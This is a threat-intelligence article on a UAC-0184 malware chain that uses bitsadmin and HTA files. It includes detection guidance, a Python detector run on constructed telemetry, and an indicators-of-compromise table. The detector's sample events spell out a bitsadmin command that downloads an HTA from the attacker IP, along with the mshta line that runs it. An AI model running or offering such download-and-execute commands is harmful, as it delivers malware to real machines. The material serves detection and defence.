UAC-0184 Malware Chain Uses bitsadmin and HTA Files for Gated
A newly documented attack chain, attributed to the threat group UAC-0184, is actively leveraging Windows’ built-in bitsadmin tool and HTA files for payload delivery. This sophisticated method allows the adversary to compromise targeted systems with malicious software. For a deeper dive into this activity, a comprehensive report is available.
The attackers use social engineering lures built around topics like criminal proceedings, combat videos, and personal contact requests to trick victims into opening malicious files.
Once a victim opens the booby-trapped document, whether it appears as a PDF, a Word file, or an Excel spreadsheet, bitsadmin quietly fetches an HTA file from an attacker-controlled remote server in the background.
That HTA file is then executed using mshta.exe, pushing the infection forward without raising any immediate alarms on the compromised machine.
Analysts at Synaptic Security said in a report shared with Cyber Security News (CSN) that the delivery mechanism appears gated, meaning the payload is only served to systems that pass certain filtering criteria, which likely helps screen out sandboxes and security researcher environments.

This kind of conditional delivery makes the malware significantly harder to study and allows the attackers to remain active without drawing unwanted attention for extended stretches of time.
The HTA file, once executed, runs a hidden PowerShell command that downloads a ZIP archive named dctrprraclus.zip from the attacker-controlled server at IP address 169.40.135.35.
UAC-0184 Malware Chain
The archive unpacks into a folder inside the AppData directory and launches two files side by side, a music visualizer application called Cluster-Overlay64.exe along with a decoy PDF named Scan_001.pdf.
The PDF is shown to the victim as a distraction while the real infection continues quietly and undetected in the background on their machine.
The broader toolset that UAC-0184 deploys reveals considerable operational sophistication. The final stage of the infection chain involves PassMark BurnInTest network components being repurposed as a covert command-and-control channel, listening on UDP port 31339 for multicast peer discovery traffic.
This abuse of a legitimate, Microsoft-signed software stack gives the attacker a convincing cover identity deep inside a trusted process tree.
The use of bitsadmin for downloading files is not new, but pairing it with HTA file execution is a deliberate technique that helps the attacker blend in with normal Windows background activity.

Bitsadmin is a native Windows command-line tool originally built for background file transfers, and its abuse by threat actors often goes unnoticed by both everyday users and many endpoint security products.
Once the HTA file executes, it drops a layered package containing Cluster-Overlay64.exe, openvr_api.dll, filter.bin, and kernel-diag.lib inside the ApplicationData32 folder. The actual malicious code is not sitting inside the main executable.
Instead it is buried inside DLL files and encoded local blobs, decrypted at runtime through a multi-stage process combining XOR operations with LZNT1 decompression.
The final payload is then side-loaded into VSLauncher.exe, a legitimate Microsoft-signed Visual Studio binary that wraps it in a trustworthy digital identity.
Signed Software Repurposed as a Cover Identity
One of the most striking aspects of this campaign is how aggressively the threat actor leans on legitimate, signed software to mask malicious behavior from defenders.
PassMark Endpoint, a genuine commercial network testing utility, becomes the final network-facing component, carrying capabilities including process memory dumping via MiniDumpWriteDump and peer data transfer over TCP port 31339.

Defenders are advised to monitor for bitsadmin and mshta.exe being used together, especially when paired with suspicious temporary file name patterns like ~tmp(…).hta.
Network teams should watch for UDP traffic toward 224.0.0.255 on port 31339, which is the PassMark multicast discovery address that this campaign repurposes for its own communication.
The presence of VSLauncher.exe running outside a legitimate Visual Studio installation path, or any unexpected file creation events inside %APPDATA%\ApplicationData32, should be treated as serious warning signs that warrant immediate investigation by security teams.
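The detection guidance above, as an added Python example (not code from the report or from Synaptic Security): it evaluates constructed Sysmon-style process, file and network events against the indicators named here and raises a correlated alert when bitsadmin and mshta.exe appear together on one host. The event schema, the sample records and the allowlisted VSLauncher.exe location are assumptions.

```python
import re
from collections import defaultdict

# Patterns taken from the indicators above; the Visual Studio allowlist path is an assumption.
TMP_HTA = re.compile(r"~tmp[^\\/]*\.hta$", re.IGNORECASE)        # ~tmp(...).hta written to %TEMP%
DROP_DIR = re.compile(r"\\ApplicationData32\\", re.IGNORECASE)   # %APPDATA%\ApplicationData32 drop folder
LEGIT_VSLAUNCHER = re.compile(r"\\Common Files\\Microsoft Shared\\MSEnv\\VSLauncher\.exe$", re.IGNORECASE)
PASSMARK_MCAST = ("224.0.0.255", 31339)                           # BurnInTest multicast discovery

# Constructed sample telemetry (assumed schema), not real logs: ws01 shows the chain, ws02 is benign.
EVENTS = [
    {"event": "process", "host": "ws01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j /download http://169.40.135.35/dctrpr/basketpast.hta C:\Users\u\AppData\Local\Temp\~tmp7f2a.hta"},
    {"event": "process", "host": "ws01", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\~tmp7f2a.hta"},
    {"event": "file", "host": "ws01", "path": r"C:\Users\u\AppData\Roaming\ApplicationData32\openvr_api.dll"},
    {"event": "process", "host": "ws01", "image": r"C:\Windows\SysWOW64\VSLauncher.exe", "cmdline": "VSLauncher.exe"},
    {"event": "network", "host": "ws01", "proto": "udp", "dst_ip": "224.0.0.255", "dst_port": 31339},
    {"event": "process", "host": "ws02", "cmdline": "VSLauncher.exe app.sln",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\VSLauncher.exe"},
    {"event": "network", "host": "ws02", "proto": "udp", "dst_ip": "224.0.0.251", "dst_port": 5353},
]

def rules_for(ev):
    """Return the names of the rules a single event triggers (empty list when benign)."""
    hits = []
    if ev["event"] == "process":
        image, cmd = ev["image"].lower(), ev["cmdline"].lower()
        if image.endswith("bitsadmin.exe") and ".hta" in cmd:
            hits.append("bitsadmin_hta_download")
        if image.endswith("mshta.exe") and TMP_HTA.search(cmd):
            hits.append("mshta_tmp_hta")
        if image.endswith("vslauncher.exe") and not LEGIT_VSLAUNCHER.search(ev["image"]):
            hits.append("vslauncher_outside_vs_path")
    elif ev["event"] == "file" and DROP_DIR.search(ev["path"]):
        hits.append("applicationdata32_file_create")
    elif ev["event"] == "network" and ev["proto"] == "udp" and (ev["dst_ip"], ev["dst_port"]) == PASSMARK_MCAST:
        hits.append("passmark_multicast_31339")
    return hits

def detect(events):
    """Group hits per host and add a correlated alert when bitsadmin fetched an HTA and mshta ran one."""
    by_host = defaultdict(set)
    for ev in events:
        by_host[ev["host"]].update(rules_for(ev))
    for hits in by_host.values():
        if {"bitsadmin_hta_download", "mshta_tmp_hta"} <= hits:
            hits.add("bitsadmin_mshta_chain")
    return {h: sorted(r) for h, r in by_host.items() if r}
```

Feeding real endpoint telemetry requires only mapping your EDR or Sysmon fields onto the assumed keys; the benign ws02 records show that a VSLauncher.exe in its expected location and ordinary mDNS multicast do not fire.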
Indicators of Compromise (IoCs):
| Type | Indicator | Description |
|---|---|---|
| IP Address | 169.40.135.35 | Attacker-controlled C2 server hosting HTA files and payload archive |
| URL | hxxp://169.40.135.35/dctrpr/slippersuppity.hta | HTA stage-1 payload URL (PDF lure variant) |
| URL | hxxp://169.40.135.35/dctrpr/basketpast.hta | HTA stage-1 payload URL (Word document lure variant) |
| URL | hxxp://169.40.135.35/dctrpr/agentdiesel.hta | HTA stage-1 payload URL (Excel lure variant) |
| URL | hxxp://169.40.135.35/dctrprraclus.zip | Payload ZIP archive download URL |
| SHA-256 | 81d93004a02a455af01b0f709e34d5134108ec350f9391dc0f91a00a54998590 | ZIP archive (dctrprraclus.zip) |
| SHA-256 | dc6cddc391b373b18f105f49a80ff83d53b430d8dea35c1f1576832fa9fbd2b3 | kernel-diag.lib (encoded payload loader) |
| SHA-256 | f5ca9c53d1537142889d7172c6643e886b2164233b91f0fc2d41ca010f035372 | filter.bin (XOR-encrypted secondary payload) |
| SHA-256 | df6942dc1a89226359adf1aac597c3b270f4a408214b4f7c2083f9524605e0f7 | openvr_api.dll (DLL sideload component) |
| SHA-256 | b811f28b844eff8c1f4f931639bed5bcc41113364fdfc44d7703259457839edb | input.dll (PassMark Endpoint sideloaded payload) |
| SHA-256 | 33e44dea247eaa8b0fc8ed1f8ed575905f6ce0b7119337ddd29863bbb03288b3 | PE_08 / SqlExpressChk.exe (bundled PE component) |
| File Path | %APPDATA%\ApplicationData32\Cluster-Overlay64.exe | Dropped music visualizer used as sideload host |
| File Path | %APPDATA%\ApplicationData32\openvr_api.dll | Dropped DLL containing loader logic |
| File Path | %APPDATA%\ApplicationData32\filter.bin | Dropped XOR-encrypted payload blob |
| File Path | %APPDATA%\ApplicationData32\kernel-diag.lib | Dropped DWORD-XOR encoded loader blob |
| File Path | %windir%\SysWOW64\input.dll | PassMark Endpoint DLL dropped for sideloading |
| File Path | %windir%\SysWOW64\VSLauncher.exe | Microsoft-signed sideload host (Visual Studio Version Selector) |
| Network | 224.0.0.255:31339 (UDP) | PassMark BurnInTest multicast discovery, repurposed for C2 peer discovery |
| Network | 31339/tcp | BurnInTest peer data channel, repurposed for C2 data transfer |
| File Name Pattern | ~tmp(…).hta | Temporary HTA file pattern written to %TEMP% during initial execution |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.